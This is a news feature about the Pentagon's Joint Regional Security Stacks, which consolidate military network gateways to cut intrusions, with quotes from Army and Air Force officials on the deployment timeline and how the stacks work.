Statistically, breaking into the Defense Department’s digital networks isn’t that easy.
There were 30 million “known malicious cyber intrusions” between September 2014 and June 2015, but less than 0.1 percent actually penetrated the Pentagon’s cyber defenses, according to Defense Secretary Ashton Carter, in a Sept. 30 memo to senior Pentagon staff.
But though miniscule in percentage terms, the aggregate number of successful attacks looms large: 30,000 successful intrusions in just 10 months. That’s got to change, Carter said in a Sept. 28 memo to the military’s senior leaders.
Now, penetrating defense networks is about to get much harder.
Over the next three years, the military will deploy a series of sophisticated gateways to better protect its vast network from external attack, according to Army Col. Scott Jackson, who oversees construction of the Joint Informational Environment or JIE.
“We’re trying to build the Fort Knox of [network] security,” Jackson said.
Central to the JIE will be 49 Joint Regional Security Stacks, through which all digital traffic must flow between the Pentagon’s networks and the Internet. These digital checkpoints will feature multiple security layers and examine every data packet entering or leaving the military’s network. Once fully in place in late 2017 or early 2018, Jackson said, reaching the network should be a lot harder.
Devices within each security stack will automatically block most attempted intrusions, while filtering others for further analysis. Packet capture technology will examine the data bits that enter and exit the network, making copies of some for detailed analysis off line.
Segregating and Analyzing Incoming Data
Rules embedded in security stack software will prevent unauthorized persons and bots from logging in. User profiles will match up with user access rights. For example, Jackson said, “No Army person should be trying to log on as an Air Force administrator.”
Data will be segregated by user types and traffic flows. Simply gaining access to the network will not be enough, as users will also need credentials to access individual systems and data on the network. The system will work like a safe deposit vault in a bank, Jackson said. If an attacker manages to break into the bank (or network), he will still “have to start drilling locks” on the deposit boxes (or individual systems) to get anything of value. “We’re making it way harder than it is right now.”
Plans call for 24 Joint Regional Security Stacks to process unclassified network traffic and 25 more to process classified traffic, said Army Chief Information Officer (CIO) Lt. Gen. Robert Ferrell.
Limiting the network’s on-ramps and off-ramps focuses the location of potential attacks. Those 49 security stacks reduce “our network’s surface attack area – the part of the network vulnerable to cyber intrusion – from over 1,000 access points to less than 50, dramatically improving network security,” Ferrell told the House Armed Services Subcommittee on Intelligence, Emerging Threats and Capabilities in February.
In essence, the JIE will be a single joint network with one shared infrastructure, one set of standards and one security architecture, connecting everyone on the DoD network, Ferrell said, adding without it, “we have too many disparate networks, too many vulnerabilities and too many barriers that prevent collaboration with partners.”
The first Joint Regional Security Stack is in operation today at Joint Base San Antonio, with three more stacks scheduled to become operational this month. “Then over the next six months, that number should begin to grow rapidly,” Jackson said.
Of the 24 stacks for unclassified traffic, 11 will be in the U.S., with the rest overseas. All should be installed by early 2018 and tested and certified by 2019, Jackson said.
The Joint Regional Security Stacks, developed by the Army, are intended to replace individual solutions developed by each service.
For the Army, that means replacing the “top-level architecture stacks” used at Army installations, said Army Brig. Gen Randy Taylor, director of architecture, operations, networks and space in the Army CIO.
JRSS is “a standardized network structure,” explained Air Force CIO Frank Konieczny, speaking at the DefenseOne Summit Nov. 2. Each service will “migrate a different way,” he said, acknowledging that the process will be “messy” at times, because it touches so many existing programs.
“We all have to move everything,” he said, referring to the four military services. He added for the Air Force, “we already have gateways, which support some of those functions of the JRSS and we will be transferring our gateways to [those] capabilities.”
The Marine Corps is more reticent. According to C4ISRNet.com, Marine Corps CIO Brig. Gen. Dennis Crall expressed concerns about the underlying concept of operations for JIE at an Armed Forces Communications and Electronics Association (AFCEA) event Nov. 13, saying until the concept of operations and software are mature, Marine participation is no more than “a definite maybe.”
The 18-inch wide racked security stacks each old security tools including firewalls, intrusion detection and prevention systems and packet capture equipment to handle incoming and outgoing network traffic.
The security stacks also house multiprotocol label switching equipment, technology that speeds up the flow of network traffic by using path labels instead of network addresses to determine the route data packets will take from their origin to their destination. Path labels speed traffic by eliminating the need for each router along the delivery route to look up the destination network address before sending each packet on to the next router.
MPLS also better manages the mix of high priority and low priority traffic, enabling each circuit to carry more traffic.
JRSS will establish a common set of defenses for the military network. Today there are hundreds of bases, each with its own network security setup, Jackson said. Some are strong, others not so. When security is regionalized, all access points to military networks will be protected to the same level. No one’s security will decrease, he said, but in many locations, it will increase.
Moving to regional security stacks also increases network situational awareness. Security managers will be able to see all traffic coming and going on DOD networks.” If suspicious activity is spotted in one location, operators will be able to see whether it is also happening elsewhere.
Right now each service, and in many cases each base, post, camp or station, may see abnormal behavior, Jackson said. “But determining if it is malicious behavior” rather than malfunctioning equipment “is difficult when hundreds of different cyber defenders are looking at their little piece of cyberspace,” Jackson said. “JRSS provides the global visibility to quickly determine if an event is malicious or not.”
Consolidating network security into 49 regional centers also means the military’s best cyber defenders can be concentrated in fewer locations.
Much of what JRSS will do will be automated. For example, intrusion prevention systems will compare network traffic to a database of known attack “signatures” – like digital “most-wanted photos,” Jackson said. When the intrusion prevention software sees a known malicious signature, it will automatically block the attack.
But human intervention will be required for other attacks.
Intrusion detection software can spot suspicious activity and sound an alarm, but just as a burglar alarm won’t stop a brick from being thrown through a window, Jackson said, intrusion prevention requires security personnel to take defensive action.
Although JRSS is expected to substantially improve Defense Department network security, there remain some security problems JRSS can’t solve.
Jackson said the event that brought down an email system used by the Joint Chiefs of Staff last summer was a “sophisticated” attack apparently launched from Russia, and “the result of a phishing attack,” Jackson said. Someone opened a phony email that introduced malware into the system.
“Each of us, as network users and providers, has an individual responsibility to protect the Department of Defense information network.”
William Matthews is a veteran defense and technology journalist. He has written for Defense News, Army Times, Navy Times, Federal Computer Week, Army Magazine and numerous other publications.